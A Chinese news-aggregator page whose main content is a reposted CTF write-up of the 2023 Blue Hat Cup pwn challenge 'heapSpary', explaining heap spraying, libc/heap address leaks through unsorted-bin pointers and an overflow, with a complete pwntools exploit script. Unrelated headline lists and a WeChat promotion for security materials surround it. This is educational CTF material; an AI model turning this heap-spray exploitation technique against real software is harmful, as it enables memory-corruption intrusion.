最新要闻
- 前7月我省快递业务量同比增长超30%
- 华为手机全面回归?Mate 60 Pro悄然发布 分析师看好销量超600万台
- 【广电快讯】目前我州降水明显减弱 预计30日2时前后趋于结束
- 争做懂青海爱青海兴青海的好干部
- 这么近 那么美 周末到河北——衡水桃城区满目皆美景
- 四川校园消防安全开学第一课直播/回放在哪儿看?
- 停气通知:8月30日长沙这些地方将停气
- 得偿所愿!国米自今年二月求购帕瓦尔,7个月后终于Here we go
- 北京首都机场股份(00694)发布中期业绩,总综合亏损10.37亿元,同比收窄27.09%
- 9月1日起施行!事关贵阳公积金……
- 韵达股份:上半年营收 215.74 亿元同比降 5.58%,利润总额同比增 63.55%
- 花蛤的快速清洗方法
- 刷屏!存量房贷利率调整,又有大消息
- 好天气来了!南宁“入秋”成功了吗?
- 共话中国经济新机遇丨通讯:中巴水务工程合作树立民心工程榜样
- 山东威海中院“三部曲”护航企业高质量发展
手机
江苏特检院淮安分院开启新一轮技术援疆
郑州银行业务规模稳步增长 2023年上半年实现营收69.18亿元
- 江苏特检院淮安分院开启新一轮技术援疆
- 郑州银行业务规模稳步增长 2023年上半年实现营收69.18亿元
- 深度解析 | 走路赚钱 一路走进“坑”
- 市交通运输局优化服务:直通港澳运输企业办理业务“零跑腿”
- Steam最新一周销量榜 《装甲核心6》成功登顶
- 近百家单位抱团 让产教融合热起来
家电
从2023蓝帽杯0解题heapSpary入门堆喷
关于堆喷
堆喷射(Heap Spraying)是一种计算机安全攻击技术,它旨在在进程的堆中创建多个包含恶意负载的内存块。这种技术允许攻击者避免需要知道负载确切的内存地址,因为通过广泛地“喷射”堆,攻击者可以提高恶意负载被成功执行的机会。
这种技术尤其用于绕过地址空间布局随机化(ASLR)和其他内存保护机制。对于利用浏览器和其他客户端应用程序的漏洞特别有效。
【资料图】
前言
此题为2023年蓝帽杯初赛0解pwn题,比赛的时候是下午放出的,很难在赛点完成该题,算是比较高难度的题,他的题目核心思想确实和题目名字一样,堆喷,大量的随机化和滑板指令思想,在赛后一天后完成了攻破。此题,不是因为0解我才觉得他有意义,是因为他的堆喷思想和实际在工作中的二进制利用是很贴合的,确实第一次打这种题。
题目分析
checksec
❯ checksec main[*] "/root/P-W-N/bulue/main" Arch: i386-32-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
保护全开,很常规。
这个题其实要是能迅速静态分析完,其实也能很快出,也算是给我上了一课,要是我的好大儿GXH在,估计是可以在比赛中成为唯一解的。
先来看整个程序是去了符号表,我们先在start那定位main函数,__libc_start_main第一个参数就是main函数地址
// positive sp value has been detected, the output may be wrong!void __usercall __noreturn start(int a1@, void (*a2)(void)@){ int v2; // esi int v3; // [esp-4h] [ebp-4h] BYREF char *retaddr; // [esp+0h] [ebp+0h] BYREF v2 = v3; v3 = a1; __libc_start_main( (int (__cdecl *)(int, char **, char **))sub_1D64, v2, &retaddr, (void (*)(void))sub_1D90, (void (*)(void))sub_1E00, a2, &v3); __halt();}
这个main没什么好看的,快进到初始化和菜单
初始化如下
unsigned int sub_134D(){ unsigned int result; // eax unsigned int buf; // [esp+0h] [ebp-18h] BYREF int fd; // [esp+4h] [ebp-14h] int v3; // [esp+8h] [ebp-10h] unsigned int v4; // [esp+Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); fd = open("/dev/urandom", 0); if ( fd < 0 || read(fd, &buf, 4u) < 0 ) exit(0); close(fd); srand(buf); v3 = rand(); malloc(4 * (v3 % 1638)); result = __readgsdword(0x14u) ^ v4; if ( result ) sub_1E10(); return result;}
初始化影响不是很大,就是建了个随机大小的chunk,但是因为后续是不释放这个chunk其实没什么影响。
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
来看菜单,4是不存在的虚空功能
int sub_15E4(){ puts("========Welcome to new heap game========"); puts("1. Create Heap."); puts("2. Show Heap."); puts("3. Delete Heap."); puts("4. Change Heap."); puts("5. Action."); puts("6. Exit."); return printf("Please give me your choose : ");}
我们直接来先看看后门函数5
int sub_1C14(){ int result; // eax unsigned int v1; // [esp+Ch] [ebp-1Ch] int v2; // [esp+10h] [ebp-18h] printf("Please input heap index : "); v1 = sub_1461(); if ( v1 > 0xFFF || !dword_4060[2 * v1] ) return puts("Error happened."); v2 = dword_4060[2 * v1 + 1] + dword_4060[2 * v1]; if ( !**(_DWORD **)v2 ) return (*(int (__cdecl **)(const char *))(*(_DWORD *)v2 + 4))("cat flag"); result = *(_DWORD *)v2; --**(_DWORD **)v2; return result;}
关于地址0x4060这个地方前面存的是堆的地址,后面是堆的大小,堆数量上限在0xFFF。
来看看v2 = dword_4060[2 * v1 + 1] + dword_4060[2 * v1];
这个就是取堆地址然堆地址加堆大小(可控输入任意值)然后赋值到v2,比如
0x565a1060: 0x57aebf90 0x00000100
得到的就是0x57aec090
然后对0x57aec090里面存放的地址进行一个内存检测操作,如果前4位为0就执行后门,取0x57aec090内的地址的内存的后四位进行指针函数调用。此时链表如下
0x57aec090 —▸ 0x57aeb300 ◂— 0x0
0x57aeb300内存如下(0xf7d99781为system地址)
pwndbg> x/32wx 0x57aeb3000x57aeb300: 0x00000000 0xf7d99781 0x00000000 0xf7d99781
分析完后门了,我们去看看add功能。可以看见是非常的长的,然后重点在于Switch选择和sub_14BA函数
_DWORD *sub_1690(){ _DWORD *result; // eax int i; // [esp+4h] [ebp-34h] int k; // [esp+8h] [ebp-30h] int j; // [esp+Ch] [ebp-2Ch] int m; // [esp+10h] [ebp-28h] int v5; // [esp+14h] [ebp-24h] int v6; // [esp+18h] [ebp-20h] int v7; // [esp+1Ch] [ebp-1Ch] for ( i = 0; i <= 254 && dword_4060[i * dword_400C * dword_4008]; ++i ) ; if ( (int *)i == off_4010 ) return (_DWORD *)puts("Ooops! Here is no space for you."); printf("How much space do you need : "); v5 = sub_1461(); if ( v5 <= 0 || v5 > 0x20000 ) return (_DWORD *)printf("Ooops! I can"t allocate these spaces to you."); for ( j = 0; j <= 15; ++j ) { for ( k = rand() % 16; dword_4060[dword_4008 * (k + i * dword_400C)]; k = (k + 1) % 16 ) ; dword_4060[dword_4008 * (k + i * dword_400C)] = malloc(v5 + 4); dword_4060[(k + i * dword_400C) * dword_4008 + 1] = v5; if ( !dword_4060[dword_4008 * (k + i * dword_400C)] ) { puts("Ooops! Some error happened."); exit(-1); } } for ( m = 0; m <= 15; ++m ) { puts("Please input your head data."); sub_14BA((char *)dword_4060[dword_4008 * (m + i * dword_400C)], dword_4060[(m + i * dword_400C) * dword_4008 + 1]); puts("Which flag do you want?"); v6 = sub_1461(); v7 = dword_4060[(m + i * dword_400C) * dword_4008 + 1] + dword_4060[dword_4008 * (m + i * dword_400C)]; switch ( v6 ) { case 1: *(_BYTE *)v7 = (unsigned __int8)sub_1528 + 0xFFFFC064 + (unsigned __int8)&off_3F9C - 4; *(_WORD *)(v7 + 1) = (unsigned int)sub_1528 >> 8; *(_BYTE *)(v7 + 3) = (unsigned int)sub_1528 >> 24; break; case 2: *(_BYTE *)v7 = (unsigned __int8)sub_1557 - 16284 + (unsigned __int8)&off_3F9C - 4; *(_WORD *)(v7 + 1) = (unsigned int)sub_1557 >> 8; *(_BYTE *)(v7 + 3) = (unsigned int)sub_1557 >> 24; break; case 3: *(_BYTE *)v7 = (unsigned __int8)sub_1586 - 16284 + (unsigned __int8)&off_3F9C - 4; *(_WORD *)(v7 + 1) = (unsigned int)sub_1586 >> 8; *(_BYTE *)(v7 + 3) = (unsigned int)sub_1586 >> 24; break; case 4: *(_BYTE *)v7 = (unsigned __int8)sub_15B5 - 16284 + (unsigned __int8)&off_3F9C - 4; *(_WORD *)(v7 + 1) = (unsigned int)sub_15B5 >> 8; *(_BYTE *)(v7 + 3) = (unsigned int)sub_15B5 >> 24; break; } } printf("Heap create from : %d to %d\n", 16 * i, 16 * (i + 1) - 1); result = dword_4040; dword_4040[0] = i; return result;}
我们先看看sub_14BA函数,可以看见逻辑是无限读入,存在堆溢出,后续堆喷滑动要用上。在输入的最后末尾都会变成0截断符,相当于带有一个off by null,但是这里也用不上的,核心在于堆块bin构造,要非常熟悉bin的回收机制,还有利用好下面的Switch选择来把0截断给绕过。
int __cdecl sub_14BA(char *buf, int a2){ while ( a2 ) { if ( read(0, buf, 1u) != 1 ) exit(-1); if ( *buf == 10 ) { *buf = 0; break; } ++buf; } *buf = 0; return 0;}
我们来继续看这个Switch选择,其实4个选项都是差不多的只是返回值的地址不一样而已,调一个就好了。
他会对所有的在0x4060上的chunk都进行赋值操作,我们先重点关注下v7的取值
dword_4060[(m + i * dword_400C) * dword_4008 + 1] + dword_4060[dword_4008 * (m + i * dword_400C)];
可以看见v7的取值一样是堆的起始地址加上我们的大小,注意注意,这个大小是我们自己输入的,也就是可以打1,2,3.....
如果是这样的话比如我们的起始地址是0x100,大小是输入了1,内容输入的是a,那么经过下面的case 1操作
case 1: *(_BYTE *)v7 = (unsigned __int8)sub_1528 + 0xFFFFC064 + (unsigned __int8)&off_3F9C - 4; *(_WORD *)(v7 + 1) = (unsigned int)sub_1528 >> 8; *(_BYTE *)(v7 + 3) = (unsigned int)sub_1528 >> 24;
就会得到内容如下(此处字节码只做替代作用,非真实情况)
0x100:a0x101:\x010x102:\x020x103:\x030x104:\x04 (本应是libc or heap 但是由于v7取的是起始地址加大小刚好覆盖了一位地址,但是无所谓,低三位随便盖)0x105:libc or heap0x106:libc or heap0x107:libc or heap
要是不去调用这4个case中的任一一个,就会变成如下,最后就会因为之前的溢出读入函数导致末尾强行加上了截断符
0x100:a0x101:\x000x102:libc or heap..................
也就是说,只要把握好一个堆块的BK指针存储上堆地址或者libc地址就能通过申请的时候申请大小为1的堆块(实际为0x10)来绕过0截断,进而泄露地址。
对于这个chunk 构造,我是直接选择了非常暴力的操作,因为他一次性add操作会直接申请16个chunk,free的时候是全free。
所以泄露操作的exp如下,直接破坏他们的链表
create_heap(0xa0, b"1","data",4)create_heap(1, b"1","data",4)create_heap(0x60, b"1","data",4)create_heap(1, b"1","data",4)delete_heap()delete_heap()delete_heap()delete_heap()create_heap(1, b"1","data",4)create_heap(1, b"1","data",4)create_heap(1, b"1","data",4)
bin如下
pwndbg> bintcachebins0x10 [ 7]: 0x579aeaf0 —▸ 0x579aeae0 —▸ 0x579aeab0 —▸ 0x579aead0 —▸ 0x579aeaa0 —▸ 0x579aea70 —▸ 0x579aea60 ◂— 0x00x70 [ 7]: 0x579ae5e0 —▸ 0x579ae880 —▸ 0x579ae810 —▸ 0x579ae7a0 —▸ 0x579ae730 —▸ 0x579ae570 —▸ 0x579ae500 ◂— 0x00xb0 [ 7]: 0x579aded0 —▸ 0x579adb60 —▸ 0x579ada00 —▸ 0x579ad950 —▸ 0x579ad740 —▸ 0x579ad8a0 —▸ 0x579ae030 ◂— 0x0fastbins0x10: 0x579ae288 —▸ 0x579ae258 —▸ 0x579ae248 —▸ 0x579ae238 —▸ 0x579ae328 ◂— ...unsortedbinall [corrupted]FD: 0x579ae0d8 —▸ 0x579adf78 —▸ 0x579adc08 —▸ 0x579adaa8 —▸ 0x579ad7e8 ◂— ...BK: 0x579ae8e8 —▸ 0x579ae338 —▸ 0x579ae648 —▸ 0x579ad7e8 —▸ 0x579adaa8 ◂— ...smallbinsemptylargebinsemptypwndbg>
此时就会出现如下的神仙堆块,这就是我们要的最完美的堆块
Free chunk (unsortedbin) | PREV_INUSEAddr: 0x579ae8e8Size: 0x151fd: 0xf7f48778bk: 0x579ae338
但是要明白一点,unsortedbin可不止这一个,而且他不是每次都一定处于链表的头部的,所以还要写一个全输出和筛选操作
# Assuming leak_all is defined as an empty list before thisleak_all = []heap_addr = Nonelibc_base = Nonefor i in range(46): leak = leak_libc(i) if leak > 0x56000000: leak_all.append(leak) print(hex(leak)) # Assigning values to heap_addr and libc_base if heap_addr is None and leak < 0xf7000000: heap_addr = leak+0x1000-0x56 elif libc_base is None and leak > 0xf7000000: libc_base = leak-0x1eb756
这样就可以稳定的获得libc,和一个堆地址。
然后经过内存调试发现,该堆地址在有一定概率在后续申请的堆块的下面,我们可以进行栈溢出覆盖该堆地址的内容,完成上面后门要求的条件。
所以,直接进行堆喷覆盖,index为0的chunk+0x100肯定在自己的下面,我们要考虑爆破的只有堆风水和上面泄露的heap_addr是不是也在index为0的chunk后面就行了,对于这个问题就交给运气吧,爆就完事了。
tips:(上面的堆风水是因为,他的add的时候用了random瞎赋值下标干扰程序增强随机化导致的,有时候链表不是我想的那么完美有可能踩值会踩不到 0x580e97a0 —▸ 0x580e8900 ◂— 0 ,会变成0x580e97a0 —▸ 0x580e8900 ◂— 0x580e8900 这就是因为堆风水导致padding不稳定,)
# Checking the assigned valuesprint("heap_addr:", hex(heap_addr))print("libc_base:", hex(libc_base))sys=libc_base+libc.sym["system"]pay=p32(0)+p32(sys)+p32(heap_addr)*0x330+(p32(0)+p32(sys))*0x1000create_heap(0x100, pay,pay,0)p.sendlineafter("Please give me your choose : ", "5")p.sendlineafter("Please input heap index : ", "0")
exp
from pwn import *# 连接到题目提供的服务端p = process("./main")context.log_level="debug"libc=ELF("/root/P-W-N/bulue/glibc-all-in-one/libs/2.31-0ubuntu9.9_i386/libc.so.6")def create_heap(size, data,data2,flag): p.sendlineafter("Please give me your choose : ", "1") p.sendlineafter("How much space do you need : ", str(size)) p.sendlineafter("Please input your head data.", data) p.sendlineafter("Which flag do you want?", str(flag)) for _ in range(15): p.sendlineafter("Please input your head data.", data2) p.sendlineafter("Which flag do you want?", str(flag))def delete_heap(): p.sendlineafter("Please give me your choose : ", "3")all_leak=[]def leak_libc(idx): p.sendlineafter("Please give me your choose : ", "2") p.sendlineafter("Please input heap index : ", str(idx)) p.recvuntil("Heap information is ") p.recv(4) leak = u32(p.recv(4).ljust(4,b"\x00")) return leakgdb.attach(p,"b *$rebase(0x01C9E)")#构建理想chunk,bk带有堆指针或libc指针,这种chunk可以批发的create_heap(0xa0, b"1","data",4)create_heap(1, b"1","data",4)create_heap(0x60, b"1","data",4)create_heap(1, b"1","data",4)delete_heap()delete_heap()delete_heap()delete_heap()#申请小chunk 疯狂切割,直接一点点带出来create_heap(1, b"1","data",4)create_heap(1, b"1","data",4)create_heap(1, b"1","data",4)# Assuming leak_all is defined as an empty list before thisleak_all = []heap_addr = Nonelibc_base = Nonefor i in range(46): leak = leak_libc(i) if leak > 0x56000000: leak_all.append(leak) print(hex(leak)) # Assigning values to heap_addr and libc_base if heap_addr is None and leak < 0xf7000000: heap_addr = leak+0x1000-0x56 elif libc_base is None and leak > 0xf7000000: libc_base = leak-0x1eb756delete_heap()delete_heap()delete_heap()# Checking the assigned valuesprint("heap_addr:", hex(heap_addr))print("libc_base:", hex(libc_base))sys=libc_base+libc.sym["system"]#堆风水随缘padding,最后的p32(0)+p32(sys)是因为要满足后门格式,由于我们不可能得到具体的距离,只能用滑板思想批量填充滑动pay=p32(0)+p32(sys)+p32(heap_addr)*0x330+(p32(0)+p32(sys))*0x1000create_heap(0x100, pay,pay,0)p.sendlineafter("Please give me your choose : ", "5")p.sendlineafter("Please input heap index : ", "0")p.interactive()
更多网安技能的在线实操练习,请点击这里>>
关键词:
从2023蓝帽杯0解题heapSpary入门堆喷
走进未来:智慧城市构建城市发展新模式
民警帮助女子守住回忆 具体是什么情况!
peak time组合(i me组合)
玛雅人的五个预言(关于玛雅人的五个预言的基本详情介绍)
齐鲁银行08月29日被沪股通减持486.92万股
再见!人民公园摩天轮
驾照考试网上预约不了_驾照考试网上预约
金猫银猫(01815)发布中期业绩,股东应占亏损1504.8万元 同比扩大45.52%
意国家队斯帕莱蒂教练组成员:布冯担任领队,奥里亚利离任
前7月我省快递业务量同比增长超30%
江苏特检院淮安分院开启新一轮技术援疆
中信证券:国内宠物食品行业仍在成长期且兼具刚需属性,未来有望维持10%-15%的增长
中国平安:上半年实现净利润698.41亿元
英伟达股价创历史新高:与谷歌云扩大合作伙伴关系
信用卡欠款还不上该怎样办
打造现代化标杆城区,恩平锦江新城北区“新”在哪?
中进医疗美股涨11.50%
烟台警备区龙口市人武部文职人员队伍成为国防教育骨干力量
华为手机全面回归?Mate 60 Pro悄然发布 分析师看好销量超600万台
【广电快讯】目前我州降水明显减弱 预计30日2时前后趋于结束
LEGION CONSO(02129.HK)停牌
闹闹女巫 0830十二星座今日运势
世界杯亚军!战胜巴西惜败阿根廷!这支特殊的中国队太励志了
浙江公安服务经济发展案例同台比拼 15个最佳案例脱颖而出
争做懂青海爱青海兴青海的好干部
推荐五部限制级大逃杀电影,设定就很限制级,画面尺度更是拉满
环岛路出现“怪洞”容易绊倒人 20多天没处理
真正优秀的人,往往都不太合群
最新任免!陕西省政府发布一批人事任免通知
玉山雅集第二弹!刘海粟美术馆看“宴”与“乐”
郑州银行业务规模稳步增长 2023年上半年实现营收69.18亿元
园区商转公业务可以线上登记了!附入口
深度解析 | 走路赚钱 一路走进“坑”
华西证券:给予伟星新材买入评级
到2025年底 重庆将进行城镇燃气油气安全专项整治
这么近 那么美 周末到河北——衡水桃城区满目皆美景
均胜电子5000万广州设立汽车科技子公司
市交通运输局优化服务:直通港澳运输企业办理业务“零跑腿”
量筒的使用方法三步(量筒的使用方法)
天猫开学季,AMD锐龙笔记本打折送大礼!
白圣女与黑牧师 第八集 弗雷德里卡留下的东西 预告
【WAYFINDER】更新 0.1.2.0
上海机电:8月29日融资买入1110.07万元,融资融券余额2.58亿元
[公司]经纬辉开23H1营收同比增逾两成 射频模组芯片研发及产业化项目有望贡献新盈利增长点
张学友武汉演唱会2023座位图
四川校园消防安全开学第一课直播/回放在哪儿看?
免费癌症筛查来了 甘肃人快码住流程方法
2023河北省计算机二级考试报名费多少钱?
今日上市:儒竞科技
一校一策,北京因雨受灾学校如期开学啦
杭州亚运会如何实现碳中和?
河南鲁山回应“700多万建雕塑”:住建局局长免职
停气通知:8月30日长沙这些地方将停气
欧科亿:8月28日融资净买入446.39万元,连续3日累计净买入490.41万元
调查发现Xbox Series同一时期销量不及Xbox One
得偿所愿!国米自今年二月求购帕瓦尔,7个月后终于Here we go
波切蒂诺:我们想让所有球员拿出最好表现 我想赢得每一项赛事
华勤技术西安研发中心正式开园
莫高窟第217窟北壁壁画(关于莫高窟第217窟北壁壁画简述)
VinFast开盘下挫20%
创业担保贷款“输血送氧” 扶持小微企业发展
容大感光:融资净偿还567.62万元,融资余额3.26亿元(08-29)
海南省政府印发实施意见 加快旅居车旅游高质量发展
电子概念股名单,你持有哪些?(8/29)
田园风光+时尚消费+休闲娱乐!海淀区温泉镇首届夏日嘉年华启动
13岁女生脖子粗一查竟是甲状腺癌
绝代智将斯维因绝版了没(绝代智将 斯维因)
1930!海港迎战巴吞联,武磊决心争夺亚冠荣誉
倒卖五月天演唱会门票两男子被处拘留14日
北京首都机场股份(00694)发布中期业绩,总综合亏损10.37亿元,同比收窄27.09%
问参经济丨为什么首次发布服务零售额?
中信证券:当前不符合减持要求的很多房企,短期内达标的难度较大
8月30日生意社WTI原油基准价为80.10美元/桶
Steam最新一周销量榜 《装甲核心6》成功登顶
美国宣布再向乌克兰提供价值2.5亿美元军事援助
湖南益阳可提供阿里斯顿壁挂炉维修服务地址在哪
9月1日起施行!事关贵阳公积金……
韵达股份:上半年营收 215.74 亿元同比降 5.58%,利润总额同比增 63.55%
世界杯最新排名!塞尔维亚两连胜,中国男篮垫底,晋级需奇迹
老婆出轨好兄弟,他逼迫朋友当面跟妻子发生关系,遭拒后痛下杀手
郭台铭躬身入局,胜算几何
近百家单位抱团 让产教融合热起来
花蛤的快速清洗方法
多家白酒上市公司上半年净利实现两位数增长 机构称板块即将迎来战略性配置机会
大连市大孤山街道:全民反诈在行动,守牢百姓“钱袋子”
AC米兰1500万报价波尔图9号前锋,萨勒马克尔斯愿意转会博洛尼亚
格凸河洞(格凸河水怪真相大白)
新增入门版,别克世纪七座臻享款售46.99万元
丰田花冠汽车
首日大涨次日大跌,打新中了就跑成常态?|新股观察
我5年前被亲戚介绍买了个商铺,听说当时好像开发商有政府的友持
求微分方程的通解方法总结(求微分方程的通解步骤)
华熙生物2023年上半年营收30.76亿元 原料、医疗终端业务高增
雪人股份:融资净买入106.54万元,融资余额3.54亿元(08-29)
乙炔气瓶作业用橡胶软管外覆层颜色(乙炔气瓶)
刷屏!存量房贷利率调整,又有大消息
秋到加榜梯田 山乡一派丰收在望景象
多家旅游平台赴日游产品降温,部分游客被“劝退”
东海证券:目前医药板块估值较低 投资价值凸显